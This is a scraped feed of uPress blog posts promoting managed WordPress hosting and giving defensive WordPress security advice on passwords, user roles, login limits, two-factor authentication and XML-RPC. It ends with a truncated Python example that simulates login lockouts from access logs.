Website security Archives - uPress
https://www.upress.io/blog/post/tag/website-security/
Managed WordPress Hosting
Thu, 13 Jan 2022 10:03:27 +0000

Managed WordPress Hosting
https://www.upress.io/managed-wordpress-hosting/
Tue, 11 Jan 2022 15:34:41 +0000

Managed website hosting essentially means that the host takes care of all your website's technical needs. If you're paying for "regular" hosting, without any management specified in the price, you're likely just getting unmanaged hosting. What's the day-to-day difference, and why do you need managed WordPress hosting? Find out here.

The post Managed WordPress Hosting appeared first on uPress.

Today, a proper online presence is crucial to the success of any business, big or small. This may seem like a simple task, but when broken down it includes a multitude of things: content creation, marketing and advertising, sales, security updates, and adding new themes and plugins, to name a few. WordPress users (especially non-geeks) can end up spending more time on website maintenance than running the business itself, which is where managed WordPress hosting can really save the day.

If you are a WordPress beginner you might be wondering, what is managed WordPress hosting?

Managed WordPress hosting is a hosting service that manages all the technical aspects of your WordPress site. The goal of managed WordPress hosting is to have WordPress experts support you in the areas where you need extra help, so you can focus on the parts of your business, blog or project that you know and love. Think of it as your own personal IT department.


Some of the services included in managed WordPress hosting are:

  • WordPress theme, core, and plugin updates
  • Regular site backups
  • Fine-tuning site performance and speed
  • Scanning for malware and other security issues
  • Quickly creating new websites
  • Building and managing staging sites
  • Website migration

What sets managed WordPress hosting apart from regular hosting?

WordPress is your website host, meaning the server and physical location of your website. While WordPress is responsible for managing the overall maintenance of the server, they do not cover the individual technical needs of your personal WordPress site.

Managed WordPress hosting, on the other hand, means that the host takes care of all your website's technical needs. Keep in mind that not all website hosting is managed hosting, so unless you are paying specifically for a managed WordPress hosting service, it is probably not included.

If you have read about different types of website hosting, you may have come across shared hosting as a lower-cost option. Why go with managed WordPress hosting if it costs more? The short answer is, you get what you pay for.

Shared website hosting features websites on all different platforms, not just WordPress, which means that in order to accommodate everyone, the hosting environment needs to be simplified. This can pose a number of issues from potential security risks to your site running slowly, depending on the other sites sharing your host.

Unlike shared website hosting, managed WordPress hosting is designed to handle WordPress sites specifically, which allows for greater customization and understanding of your exact technical needs.

Do you need managed WordPress hosting?

Managed WordPress hosting is a great service, but whether or not you need it is dependent on how much traffic your WordPress site gets, how much technical knowledge you have and how much time and money you have at your disposal. If you are a serious techie or on a tight budget, managed WordPress hosting may not be for you.

For owners of small businesses or high-traffic blogs who are looking to expand but lack the time or technical skills to deal with all that comes with running a WordPress website, managed WordPress hosting is a great resource.

Managed WordPress hosting may be more costly than other options, but if you factor in potential website crashes and security breaches that could affect business, it is a service that pretty much pays for itself. Not to mention the added stress relief of knowing your WordPress site is in good hands.

The pros and cons of managed WordPress hosting

If you are on the fence about whether or not you need managed WordPress hosting, weighing the pros and cons might help you make an informed decision.

Pros

  • Increased website security
  • Managed WordPress expert support
  • Lightning speed
  • Free dev tools/staging site
  • Automatic updates/backups

Cons

  • Price
  • Limited to WordPress sites, does not support external non-WordPress code
  • Email service and domain names not always included

Advantages of using managed WordPress hosting

Still not sure if managed WordPress hosting is for you? Let's break down some of the services included in managed WordPress hosting to help you make up your mind.

Lightning speed

Managed WordPress hosting servers are built to handle high levels of traffic, meaning as your business grows, it will not be at the cost of your site's speed. So feel free to scale up without worrying about slowing down.

Expert Support

Managed WordPress hosting means having your own team of WordPress experts at your service at all times. Unlike shared hosts, these experts know WordPress front to back and can advise you on all things tech. No longer will you be left wondering how to fix a bug or which plugins to avoid; your personal managed WordPress council has you covered.

Automatic updates and backups

Managed WordPress hosting teams are constantly figuring out how to best optimize your site via proxy content distribution network (CDN) centers and server-level caching, so you don't have to worry about staying on top of the latest plugins for site-level caching. They can also help you remove unnecessary plugins, which means lower security risks.

Managed WordPress hosting should also include automatic backups to ensure your peace of mind every step of the way.

Security

Managed WordPress hosting increases security on your site to the point that a hacking attempt is basically just a waste of time. Managed WordPress hosting provides features including but not limited to active spyware and malware scanning that help boost security specifically in areas of weakness that hackers know to look for on WordPress.

As mentioned above, managed WordPress hosting also ensures that your WordPress core, theme, plugins, etc. are all up to date, which is also extremely important to your site's security. On the off chance that a hacker is somehow able to bypass all of these measures, your managed WordPress hosting team will help you through the recovery process.

Development Tools

Managed WordPress hosting includes tools that help you to best develop your site. These tools may differ depending on your host, but one example of a dev tool is a WordPress staging site which is basically a clone of your website where you can test out different themes and design features before taking them live.

Additional benefits

While we covered some of the top benefits of managed WordPress hosting, you can also look forward to many other perks from tools that help you monitor web traffic and customer behavior, to simple website conversion, among many others. Managed WordPress hosting ultimately allows you to scale your business by providing you the best support and tools to do so.

What is the cost of managed WordPress hosting?

What is managed WordPress hosting going to cost? Managed WordPress hosting does cost more than unmanaged hosting, but the service you receive with managed WordPress hosting is at least equal to that of a system admin or tech support, which you would likely need to hire without WordPress experience.

Service admins, as opposed to managed WordPress hosting experts, generally do not have the same level of experience with WordPress specifically. This means that plugin updates and overall maintenance will still likely be left to you, which takes time and leaves room for error. Even one site crash or security issue could end up costing you more than managed WordPress hosting.

Managed WordPress hosting also ultimately allows you to scale your website by providing you the best support and tools to grow your business in ways that would take much more time and effort on your own. Think of managed WordPress hosting as a shortcut to a successful web presence, which we all know can’t be bad for business.

As managed WordPress hosting experts, we know what we're talking about, whether you need advice on the pros and cons of regular vs. managed hosting, you want to know which plugins are critical, or you're finding that your site is slow and you need help troubleshooting. You can trust us with the entire gamut of WordPress questions, so the only one left is... why aren't we hosting your WordPress site yet?

A WordPress Sandbox: What it is, Why You Need it and How to Use it
https://www.upress.io/a-wordpress-sandbox-what-it-is-why-you-need-it-and-how-to-use-it/
Mon, 10 Jan 2022 11:06:43 +0000

Have you ever spent hours updating your WordPress site only to have it crash, losing all your work? Don't you wish there were a place you could test changes to your WordPress site before taking them live? A WordPress sandbox allows you to play around with your site while removing the risk.

The post A WordPress Sandbox: What it is, Why You Need it and How to Use it appeared first on uPress.

Most WordPress users find themselves constantly developing their site, from plugin updates to minor daily adjustments. It can be tempting to work on your site live, but even the smallest changes can put your site at risk. Even a single line of faulty code can keep your site from running smoothly.

Setting up a staging site (essentially a clone of your site) is a great way to test changes before taking them live. A WordPress sandbox is a staging environment in which you can modify your site freely without worrying about a mistake negatively affecting your site availability or your business.


Let's take a look at everything you need to know about a WordPress sandbox to get you on track to start innovating.

Dangers to look out for when you make changes on a live site

Even the smallest tweaks on a WordPress site can have a big impact. Until you test these changes, you can't be sure how they will affect your site. Whether you are updating plugins or trying out a new theme, one wrong move can lead an entire site to crash. A site crash may be the worst-case scenario, but there are a number of other risks involved in implementing changes before testing them.

Some other potential consequences of working on your WordPress site in a live environment are:

  • Broken website design
  • Drop in search engine ranking
  • Slow website load speed
  • Loss of visitors and potential business
  • Putting sensitive information at risk of exposure

WordPress website management is much more difficult when you do not know the potential issues that may arise with each adjustment you make to your site. The risks of working on your site in a live environment definitely outweigh the rewards, which is why you should have a staging site for all your WordPress development.

What is a staging site?

A staging site, or sandbox site, is an exact copy of your WordPress site in which you can experiment with modifications before taking them live. The staging site helps you catch errors in code or simply test different design elements without modifying your actual site. Whether you want to try out a new feature, update widgets or plugins, or make a major change, the staging site provides an environment in which you can do so safely.

While some users download WordPress locally on their devices to test changes before adding them to their live site, this may not always give accurate results. Certain changes made on the local server may not run the same way on the live server, leading to unforeseen errors.

Unlike the local WordPress server, the staging site runs on the same server configuration as your live site, so you will not run into any new issues when you are ready to take the changes from the staging environment to the live environment.

In short, the WordPress sandbox or staging site is a space for you to explore new things and figure out what works best on your site.

How to set up a staging site for WordPress

There are a number of options when it comes to setting up a WordPress staging site, some of which are more complicated than others. The best solution is dependent on your level of website management expertise. We have outlined the different ways to set up a WordPress Sandbox to help you get started.

Setting up a staging site through your WordPress host

If you are using a WordPress hosting service, a staging site may be offered as part of your package. If so, this is the easiest and most reliable way to set up your staging site. As managed WordPress hosting experts at uPress, for example, we provide a built-in sandbox, so you don't have to do any of the heavy lifting.

Another advantage to this option is that once you have decided which change you would like to take live, your managed WordPress host will also ensure that this process runs smoothly. Additionally, you'll usually be able to access your staging site in one click from within your dashboard or control panel.

This sandbox option offers the most convenience and the least headache, but it may be more costly than the other sandbox options below. On the other hand, if you want the other features included in managed WordPress hosting anyway, the inclusion of the sandbox may just make the deal even sweeter.

Setting up a staging site with a WordPress plugin

If you do not use a WordPress hosting service, or your hosting service does not include a staging site, there are a number of WordPress plugins that can help you create a staging site. While this may be a cheaper option, there are some downsides.

For one, if you are using a WordPress hosting service in addition to a staging plugin, there might be compatibility conflicts as the plugin will not have full access to your hosting server.

Another potential issue with using a plugin is that the data from your staging site will be saved on the plugin's server. If your site contains sensitive data, such as customer information, this option may not provide the level of security you are looking for.

If you do want to go with a WordPress plugin for your staging site, you can download one from the WordPress plugin directory. The process of creating your staging site will differ depending on which plugin you decide to download.

Set up local installation

If you would like to set up an offline staging site, local installation is an option. Keep in mind that, unlike the other options for setting up a staging site, only those with access to your computer will be able to use a local staging site.

There are multiple free applications you can download to help you set up a local hosting environment on your computer, such as Local or Bitnami. Each application will differ slightly but will walk you through the setup process once you have downloaded it.

While this option is cheap, the downside is that you will have to transfer your live site to your local staging site. This means that you will have to manually add any plugins or themes that you use on your live site, which takes more time than the previous options and also needs more technical know-how.

Setting up a staging site for WordPress manually

This option is more complicated than the others and is not recommended for WordPress beginners. To manually create a WordPress staging site, you will need to create a subdomain and an FTP account, import your database, and hide your staging site. If any of the steps are not completed correctly, it could cause problems on your live site, which kind of defeats the purpose of a staging site to begin with.

If you do decide to manually set up your staging site, implementing the changes to your live site later is also a lengthier process with its own set of drawbacks.

Unless you are an experienced WordPress manager, this is probably not the option for you.

Tips for best using a sandbox

Once you have chosen the best option for setting up your staging site, the fun can begin. Think of the sandbox as exactly that: a place to play on your site with whatever different themes, plugins and design ideas you want. Feel free to explore the world of WordPress and expand your site’s horizons. The WordPress sandbox protects your site from any security breaches or crashes so you can keep your site up-to-date and in line with your newest business ideas, without risking any crashes or design disasters.

Once you are ready to deploy your changes to your live site, depending on which option you are using for your staging site, you should be able to do so quickly and easily. Most WordPress hosts and some plugins allow you to deploy changes with the click of a button.

All the world's a staging site... so go become a player.

As managed WordPress hosting experts, we know what we're talking about, whether you're asking what a WordPress sandbox is, why you need it, or how to use it for website management. You can trust us with the entire gamut of WordPress questions, so the only one left is... why aren't we hosting your WordPress site yet? Click below and join us.

Discover your personal WordPress sandbox today - click here

What is managed WordPress hosting?
https://www.upress.io/what-is-managed-wordpress-hosting/
Tue, 13 Jul 2021 08:43:13 +0000

Every website host is responsible for maintaining the server, which is the physical home of your website, but that doesn’t mean they are providing managed website hosting, which means that the host takes care of all your website’s technical needs. Learn about the difference!

The post What is managed WordPress hosting? appeared first on uPress.

Building a great website for your new business, blog, or project is one thing. Keeping it going is another. Not every website owner has the technical ability, expertise, and most of all, time to keep on top of the many small tasks that keep a WordPress website up and secure. This is where managed WordPress hosting comes in. You might be asking yourself, what is managed WordPress hosting?

Managed WordPress hosting means those tasks are dealt with by somebody else (hopefully, a managed WordPress hosting expert!). Technical maintenance jobs handled by website hosting management include:

  • WordPress theme, core, and plugin updates
  • Regular site backups
  • Fine-tuning site performance and speed
  • Scanning for malware and other security issues
  • Quickly creating new websites
  • Building and managing staging sites
  • Website migration


What is managed WordPress hosting vs. regular hosting?

Every website host is responsible for maintaining the server, which is the physical home of your website, but that doesn't mean they are providing managed website hosting. What is managed WordPress hosting exactly, then?

Managed website hosting essentially means that the host takes care of all your website's technical needs. If you're just paying for website hosting, without any management specified in the price, you're likely just getting unmanaged hosting.

Many website owners use shared hosting for low-cost website hosting. But that can bring security risks (for example, if one site is hacked, the others on the same server can be at risk), plus another site's increased traffic can cause your site to slow down. However, managed website hosting can refer to either shared or private website hosting.

A typical host has websites using many different platforms on the same server, so the environment has to be pretty generic. In contrast, managed website hosting offers an environment that's fully customized for the needs of WordPress websites in particular, with all systems tailored to WordPress sites.

What is managed WordPress hosting able to provide you?

There are a number of benefits to using managed WordPress hosting for your website.

Tech expertise at your fingertips

Managed WordPress hosting means you effectively have a WordPress expert at your disposal all the time. You don't need to learn the tech side of things yourself, or hire a techie every two minutes to troubleshoot a bug or handle core updates; you can just leave it to the hosting management team.

Optimized website performance

What is managed WordPress hosting management doing for your website's performance? By optimizing your website for speed at the server level, your site won't slow down when traffic levels spike, and you can scale up whenever you like without worrying about it.

Managed website hosting teams improve performance with proxy content distribution network (CDN) centers and server-level caching, so you won't break your head installing and managing plugins for site-level caching. Plus, the fewer plugins you have, the fewer potential back doors there are into your site.

Stronger website security

What is managed WordPress website hosting doing for your site's security? Managed hosting boosts security in numerous ways. It typically boasts features like free SSL certificates, and real-time scanning for worms, viruses, spyware, malware, spam, etc. baked into the system. Because it's for WordPress websites only, managers can optimize security features to compensate for known WordPress weaknesses.

Managed WordPress hosting ensures that your WordPress core, theme, plugins, etc. are updated promptly, closing security loopholes. If you are unlucky enough to get hacked, your managed WordPress hosting team will help you deal with it.

Staging site free of charge

Managed WordPress hosting includes a staging site that allows you to test drive different features and experiment with your website without worrying about affecting visitor experience or affecting something on your existing site.

More benefits

What else is managed WordPress hosting boasting? Other advantages to managed WordPress hosting include the option of a complete WordPress install within minutes; advanced dashboards that help you track visitor numbers and behavior; and automated daily backups that ensure that you can quickly and easily get your website back if anything goes wrong.

Do you need managed WordPress hosting?

The decision whether or not to use managed WordPress hosting depends on your specific circumstances. If you have plenty of tech know-how, and also enough time to handle ongoing maintenance and management yourself, you probably don't need managed WordPress hosting. It's also not an option for website owners on a very tight budget.

But if you don't have the time and knowledge to manage all aspects of website maintenance alone, and/or you need reliable website uptime and can't afford any downtime or glitches, then it's even odds you need managed WordPress hosting to give you peace of mind and time to dedicate to running your business.

The pros and cons of managed WordPress hosting

Pros

  • Peace of mind about website security
  • Dedicated customer support
  • Faster website response speeds
  • Free staging site
  • Advanced analytics dashboards

Cons

  • More expensive than unmanaged website hosting
  • Only suitable for WordPress sites and can't support external non-WordPress code
  • Doesn't always include domain names or email service

What is managed WordPress hosting going to cost? Is it worth it?

The short answer is Yes, and Probably yes.

What is managed WordPress hosting going to cost compared to unmanaged hosting? Managed WordPress hosting always costs more than unmanaged hosting, because you are receiving a higher level of service than with unmanaged hosting. However, you have to balance those extra few dollars a month for the service against the money you save by avoiding the results of unmanaged hosting.

For a start, without managed WordPress hosting you'd probably need to pay for technical support on a regular basis, or put up with the hassle of managing plugins, caching, maintenance, updates, and security trouble-shooting yourself. The cost of just one security incident a year is probably more than you'd spend on managed WordPress hosting.

With managed WordPress hosting, you can focus on building your business instead of dealing with technical issues and maintenance tasks. It gives you peace of mind while also ensuring that your site operates at optimized performance and delivers the best speeds so that visitors are always satisfied.

As managed WordPress hosting experts, we know what we're talking about, whether you need advice on the pros and cons of regular vs. managed hosting, you want to know which plugins are critical, or you’re finding that your site is slow and you need help troubleshooting. You can trust us with the entire gamut of WordPress questions, so the only one left is... why aren't we hosting your WordPress site yet?

Top 10 WordPress Security Vulnerabilities - and How to Protect Your Site
https://www.upress.io/top-10-wordpress-security-vulnerabilities-and-how-to-protect-your-site/
Thu, 01 Jul 2021 09:31:57 +0000

WordPress sites can be highly secure, as long as you take steps to prevent, address, or otherwise mitigate security vulnerabilities. Here's the skinny on how to keep your WordPress site updated, patched, and protected against cyber threats.

The post Top 10 WordPress Security Vulnerabilities - and How to Protect Your Site appeared first on uPress.

It's practically gospel that WordPress sites are less secure than sites built on other platforms, but that's actually a myth. We are managed WordPress hosting experts, so we know! WordPress is far and away the most popular website host, which means that the chances are high that any given site that gets hacked will have been built on WordPress.

Of course, it's still vital for website managers to keep their WordPress sites updated, patched, and protected against cyber threats. Here are 10 of the main WordPress security vulnerabilities that hackers could target to break into your website, and suggestions for ways to strengthen them and close the wormholes.



  1. Vulnerable plugins 

Plugins add so much functionality to WordPress sites, but if you're not careful, they could turn into a vulnerable backdoor. There are tens of thousands of plugins and themes made by third-party developers and companies worldwide, but not all of them are equally secure or trustworthy.

It's crucial to choose plugins which are actively managed, with owners who regularly release updates and provide support. Just like core WordPress updates, plugin and theme updates help fix known WordPress security vulnerabilities, close loopholes that hackers could exploit, and make sure that your site is as secure as possible. An old plugin that no longer receives active support can therefore be an open door for hackers.

It can often be tempting to use a premium plugin or WordPress theme that's not offered through the WordPress plugin repository, but it's often a mistake. Sometimes, these premium plugins and themes aren't updated regularly, and sometimes not at all. Even when they are updated, the process is usually complicated and has to be done manually, so unless you keep on top of the updates, there's a high risk that your plugin will go un-updated.

As managed WordPress hosting experts, we highly recommend using only plugins and themes from the official WordPress plugin repository that were developed by well-known companies and are kept updated for your managed WordPress hosting or self-hosted site. This will go a long way to preventing any security issues, since these plugins and themes are thoroughly checked to make sure they don't contain any malicious code and are in line with security regulations.

  2. Default passwords

Passwords are meant to protect the entrance to websites and web hosting platforms under your control, so they are often the first line of attack for hackers. One of the most common approaches is a brute-force attack, in which hackers just try out hundreds of passwords, hoping that they'll get lucky and hit on the one you used for your account. That's why it's so important to create a long and complicated password for your website. The harder it is to guess your password, the less likely it is that this kind of attack would succeed.

You'd be amazed at the number of web managers and developers who forget to change the default password on their website — and when we say website, we mean not just the WordPress site itself, but also the WordPress dashboard, FTP accounts, databases, WordPress managed hosting, the email you use to recover your site, and anything else tied to it. If you're using managed WordPress hosting, make sure that you generate a different unique password for every account. Reusing a password you've used before, or are using elsewhere, raises the risk that someone will guess it, or hack it from a different site.

Even more sites have passwords like "password", "12345678", or easy-to-guess options like birth dates, ID numbers, and phone numbers, which are always among the first that bots or hackers will try.

Many website owners don't like to use long and complicated passwords simply because they're hard to remember. A good solution is to use a complete sentence that makes sense only to you (and even misspell a word on purpose) so it's much easier to remember. These kinds of passwords are much stronger than a single-phrase password.

Another solution would be to use a password manager that generates and stores unique secure passwords. That way you only have to remember one secure password: the one for your password manager.

It's not just the password, either: you also need to pick a secure username for your managed WordPress hosting or self-hosted website. If you use "admin" as your username, you are basically doing half the job for hackers targeting your website.

  3. Weak user permissions

The more people who can access your WordPress dashboard, the greater the risk that someone will introduce an unsafe plugin, use a weak password, or accidentally activate infected software. It's easy to lose track of permissions if you're managing a large team of web designers, editors, SEO managers, writers, and more, but it's crucial to restrict access to mission-critical areas.

WordPress has a number of different user roles, each of which permits a different level of access and activity:

  • Subscriber – A registered user who can only access their own personal profile.
  • Contributor – A user with permission to edit and manage their own posts, but who can't publish any content.
  • Author – A user with permission to edit, manage, and publish their own posts.
  • Editor – A user with permission to edit, manage, and publish their own and other users' posts and pages, but without permission to access "sensitive" areas of the dashboard.
  • Administrator – A user with permission to view and change all WordPress dashboard areas and every feature and option.
  • Super Administrator – (Only available on Multisite installs) User with permission to access and manage all the websites on a Multisite network.
  1. Unlimited login attempts

Hackers can only attempt the brute force attacks mentioned above if they have an unlimited number of opportunities to keep trying to guess your password. By default, WordPress allows unlimited login attempts from any IP address, which just makes it easier for malicious actors.

Close this WordPress security vulnerability by setting WordPress to automatically block the attacker's IP after a certain number of failed attempts. One of the easiest ways to set this up for self-hosted or managed WordPress hosting is using a plugin called Limit Login Attempts Reloaded. It's available for download from the official WordPress plugin repository.

uPress customers: The plugin WeSafe is installed by default on all the websites on our servers and performs this action.

  1. Single-factor authentication

"Regular," single-factor authentication just requires anyone logging in to enter their username and password, and then they can gain entry. It means that hackers effectively only have to pass through one "gate" to enter the website and is one of the more serious WordPress security vulnerabilities.

You can make it much harder for them by activating two-factor authentication (TFA). With two-factor authentication, everyone has to enter a unique one-time code sent via email or SMS to their pre-registered account or phone number, or one that's generated on another registered device, as well as getting the right password.

One of the easier ways to do this for your managed WordPress hosting site is by using the Google Authenticator plugin that's available for download from the official WordPress repository. It offers two-factor authentication via a mobile app (note that you need to install the Authenticator app on your phone for this to work). After installing everything, you log in to your WordPress site with your username and password. You'll be requested to enter a 6 digit code from the mobile app. The code changes every 30 seconds and can be generated only on the app that is paired with your user account.

  1. Sending unencrypted data

Whenever something is changed on the WordPress hosted site you manage, the data travels from one server to another, giving malicious actors an opportunity to intercept the information packets and steal the data. But if you encrypt it, using a TLS encryption certificate, they wouldn't be able to read the data even if they could capture it.

The TLS certificate is based on unique encryption keys installed on the website's server. Only your computer will be able to use those keys to decrypt the information. You can acquire a TLS certificate for free with most hosting providers, using Let's Encrypt.

uPress customers: You can install a TLS certificate from the security tab in our management panel.

  1. Ignoring backdoor vulnerabilities

Backdoors are a kind of malware that hackers send out, often disguised as authentic WordPress system files, in the hopes that someone will install it on their site. Once installed, it creates a kind of wormhole that lets hackers enter the server by the backdoor (hence the name) and creep across to other sites hosted on the same server.

As well as enabling two-factor authentication, checking site permissions, and preventing unlimited login attempts, you can help protect your site from backdoor WordPress security vulnerabilities by regularly scanning it with tools like SiteCheck that detect common backdoors.

  1. Malicious redirects

A malicious redirect attack is when the hacker changes some of the code in your website files, either by entering through a back door, using a rogue plugin or theme, or breaking into your server.

Disabling unlimited login attempts, ensuring your passwords are strong, and checking your permission levels can all help prevent malicious redirects. It's also a good idea to scan your site from time to time with a scanning plugin, and follow up on any alerts that you receive.

  1. Permitting XML-RPC protocols

Since WordPress version 3.5, every WordPress site has the XML-RPC protocol enabled by default. Although this helps connect your WordPress managed site with other applications and websites, it can also compromise your security. XML-RPC allows hackers to use the system.multicall function to attempt logging in with thousands of different passwords in only a small number of requests.

You can disable it by using the Disable XML-RPC-API plugin, by restricting access to the xmlrpc.php path at the server firewall level, or by using the .htaccess or nginx.conf file at the server level.

  1. Welcoming bad bots

Many hackers use bots as "spies" to check on your website's defenses and performance before they decide to attack. As well as scoping out your site for WordPress security vulnerabilities, bad bots can drag down performance and steal bandwidth and content.

But you don't need to let them through the door. There's a list of "bad bots" on botreports.com, and you can block them from entering your site at all. Most security plugins and managed storage services already block the bots on this list, but you can be doubly safe by blocking them at the firewall, at server level with the .htaccess or nginx.conf file, or by installing the StopBadBots plugin.

uPress clients: There is an on/off button to block bad bots under the Security tab.

Stop WordPress security vulnerabilities from turning into security incidents

WordPress sites can be highly secure, as long as you take steps to prevent, address, or otherwise mitigate security vulnerabilities before hackers can take advantage of them. These 10 tips won't prevent every security incident, but they are a very good start to making your WordPress managed sites as secure as possible.

As managed WordPress hosting experts, we speak your language. We can geek out with you about security vulnerabilities, but we can also discuss HTTP2 protocol, IPv6 support, or DNS tools. You can trust us with the entire gamut of WordPress questions, so the only one left is... why aren't we hosting your WordPress site yet? Click below and join us.

The Complete WordPress Security Guide Part 1 https://www.upress.io/wp-security-guide/ Sun, 10 Jan 2021 07:47:00 +0000 https://www.upress.io/?p=566 Every website owner’s biggest concern is securing a managed WordPress hosting website. In this series, we’ll walk you through the best maintenance and security advice for securing your managed WordPress hosting website from secure themes and plugins to passwords and permission management.

The Complete WordPress Security Guide part 1: Setting your site up for success

Every website owner's biggest concern is securing a managed WordPress hosting website.

According to research by w3techs in March 2019, WordPress is by far the most popular Content Management System (CMS). 60.4% of websites that use a CMS use WordPress, or around 3.5% of all websites.

That means that there are millions of website owners concerned about securing their managed WordPress hosting. You've probably heard the myth that WordPress sites experience a lot of attacks and hacking opportunities because WordPress isn’t secure, but the likeliest reason is simply down to the numbers. WordPress has more reported security issues and hacked websites because it makes up such a large percentage of CMS hosted websites. This gives more incentive for hackers to search for security flaws and exploits in WordPress websites, because they have so many more potential targets.

WordPress as a system, and especially its core files, is highly secure. The core is regularly maintained and frequently updated by hundreds of programmers who are part of the open-source WordPress community. In fact, a significant proportion of WordPress security problems result from human error, like a managed WordPress hosting site that wasn't configured correctly or WordPress site updates that were poorly maintained.

In this guide we'll discuss the best maintenance and security advice for securing your managed WordPress hosting website.

WordPress Security should be taken seriously

Fun Fact – On a weekly basis Google adds more than 20,000 websites to their blacklist for malicious content, and more than 50,000 websites for phishing.

* This guide is aimed at WordPress websites hosted on a Linux server, but may be relevant for managed WordPress hosting on Windows servers as well.

This section is aimed at website owners using managed WordPress hosting or who are handling their own WordPress site management, and want to set everything up with the greatest possible level of security.

Choose secure themes and plugins

When your site uses managed WordPress hosting, you're benefiting from the large community of dedicated web developers who keep WordPress free and open-source. The CMS may look like a single unit, but it's actually made up of two main components:

  • The core WordPress code
  • Themes and plugins installed by the user

The immense success of WordPress generated a huge repository of plugins and themes, made by third-party developers and companies worldwide. These plugins connect to your core WordPress site, adding features and functionality to your managed WordPress hosting site.

WordPress has tens of thousands of plugins and themes. It's crucial to choose ones which are actively managed, with owners who regularly release updates and provide support. Just like core WordPress updates, plugin and theme updates help fix known security issues, close loopholes that hackers could exploit, and make sure that your site is as secure as possible. An old plugin that no longer receives active support is an open door for hackers.

* A note on premium/paid plugins and themes that are not available through the WordPress plugin repository:

Paying for a plugin or theme outside of the WordPress plugin market does not guarantee its quality and security. All too often, these premium plugins and themes aren't updated regularly, or at all. Even when they are updated, the process is usually complicated and has to be done manually.

We highly recommend using only plugins and themes from the official WordPress plugin repository that were developed by well-known companies and are kept updated, for your managed WordPress hosting or self-hosted site. This will go a long way to preventing any security issues, since these plugins and themes were thoroughly checked to make sure they don’t contain any malicious code, and are kept in line with security issues.

Select strong usernames and passwords

Picking a unique username

It’s crucial to pick a secure username for your managed WordPress hosting or self-hosted website. If you use "admin" as your username, you are basically doing half the job for hackers targeting your website.

This is probably one of the most important and easy steps you can take to secure your website and prevent unnecessary risks.

Selecting a secure password

A Brute Force attack is one of the most common hacking methods. It's when hackers just try out hundreds of passwords, hoping that they'll get lucky and hit on the one you used for your account. The harder it is to guess your password, the less likely it is that this kind of attack would succeed.

That’s why it's so important to create a long and complicated password for your website. When we say "for your website," we mean your WordPress dashboard, your FTP accounts, databases, WordPress managed hosting, the email you use to recover your site, and anything else tied to your website. If you’re using managed WordPress hosting, make sure that you generate a different unique password for every account.

There's a surprising number of WordPress users that use phrases such as "password" or "12345678" as their password. These passwords, along with birth dates, ID numbers, and phone numbers, are easy to guess and will be among the first that bots or hackers will try.

Many website owners don't like to use long and complicated passwords simply because they're hard to remember. A good solution is to use a complete sentence that makes sense only to you (and even misspell a word on purpose), so it's much easier to remember. These kinds of passwords are much better than a single-phrase password (although only replacing letters with numbers is not secure enough).

Another solution would be to use a password manager that generates and stores unique secure passwords. That way you only have to remember one secure password; the one for your password manager.

If you’re composing the passwords yourself, it's recommended to use at least 8 characters, and include at least one of each of the following:

  • Numbers (1-9)
  • Lower case letters (a-z)
  • Upper case letters (A-Z)
  • Special characters (!@#$%^ etc).

Never reuse a password you’ve used in the past! The ideal password is unique and hard to guess based on easily accessed information.

Enforce strict permission management

Run a strict and clear policy with your user permissions so that only people who really need it can get access to your WordPress dashboard. If you are using managed WordPress hosting or have a large team of designers, editors, SEO managers etc. make sure you understand their roles before giving them permission to make changes to your website.

WordPress has the following user roles and their permissions:

  • Subscriber – A user registered on your website who can only access their own personal profile.
  • Contributor – A user with permission to edit and manage their own posts, but who can't publish any content.
  • Author – User with permission to edit, manage, and publish their own posts.
  • Editor – User with permission to edit, manage, and publish their own and other users’ posts and pages, but without permission to access “sensitive” areas of the dashboard.
  • Administrator – User with permission and access to view and change all WordPress dashboard areas and every feature and option.
  • Super Administrator – (Only available on Multisite installs) User with permission to access and manage all the websites on a Multisite network.

* Themes and plugins can add or remove roles.

Limit the number of failed login attempts

As mentioned above, Brute Force attacks are carried out by hackers or bots trying to guess your password. If there's no restriction on the number of failed login attempts, the attacker can keep trying indefinitely until they manage to guess the correct password and access the dashboard.

When you set a limit to the number of failed login attempts before the system automatically blocks the attacker’s IP from accessing the website, you cut these attackers off from your site.
One of the easiest ways to set this up for self-hosted or managed WordPress hosting is using a plugin called Limit Login Attempts Reloaded. It’s available for download from the official WordPress plugin repository.

uPress customers: The plugin WeSafe is installed by default on all the websites on our servers and performs this action.
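
The lockout rule described above, replayed over access-log lines (an added example, not code from uPress or from the plugins named here). It assumes a failed login appears as a POST to wp-login.php answered with 200 and a successful one as a 302 redirect; the threshold, window and lockout length are illustrative values, and the log lines are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache/nginx "combined" access-log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

MAX_FAILURES = 5                   # assumed policy values, tune for your site
WINDOW = timedelta(minutes=10)     # failures are counted inside this window
LOCKOUT = timedelta(minutes=20)    # how long an IP stays blocked


def parse(line):
    """Return the fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],
        "status": int(m["status"]),
    }


def simulate_lockouts(lines):
    """Replay chronological log lines through the lockout rule.

    Returns {ip: {"lockouts": n, "rejected": n}} for every IP that would
    have been blocked; "rejected" counts attempts made while blocked.
    """
    recent = defaultdict(deque)    # ip -> timestamps of recent failures
    locked_until = {}
    report = {}
    for line in lines:
        ev = parse(line)
        if ev is None or ev["method"] != "POST":
            continue               # viewing the login form is not an attempt
        if not ev["path"].endswith("/wp-login.php"):
            continue
        ip, ts = ev["ip"], ev["ts"]
        if ip in locked_until and ts < locked_until[ip]:
            report.setdefault(ip, {"lockouts": 0, "rejected": 0})["rejected"] += 1
            continue
        if ev["status"] == 302:    # assumed: successful login, reset the count
            recent[ip].clear()
            continue
        if ev["status"] != 200:    # assumed: only 200 means "wrong password"
            continue
        failures = recent[ip]
        failures.append(ts)
        while failures and ts - failures[0] > WINDOW:
            failures.popleft()     # forget failures older than the window
        if len(failures) >= MAX_FAILURES:
            locked_until[ip] = ts + LOCKOUT
            report.setdefault(ip, {"lockouts": 0, "rejected": 0})["lockouts"] += 1
            failures.clear()
    return report


def make_line(ip, ts, status, method="POST", path="/wp-login.php"):
    """Build one constructed log line (sample data only)."""
    stamp = ts.strftime("%d/%b/%Y:%H:%M:%S")
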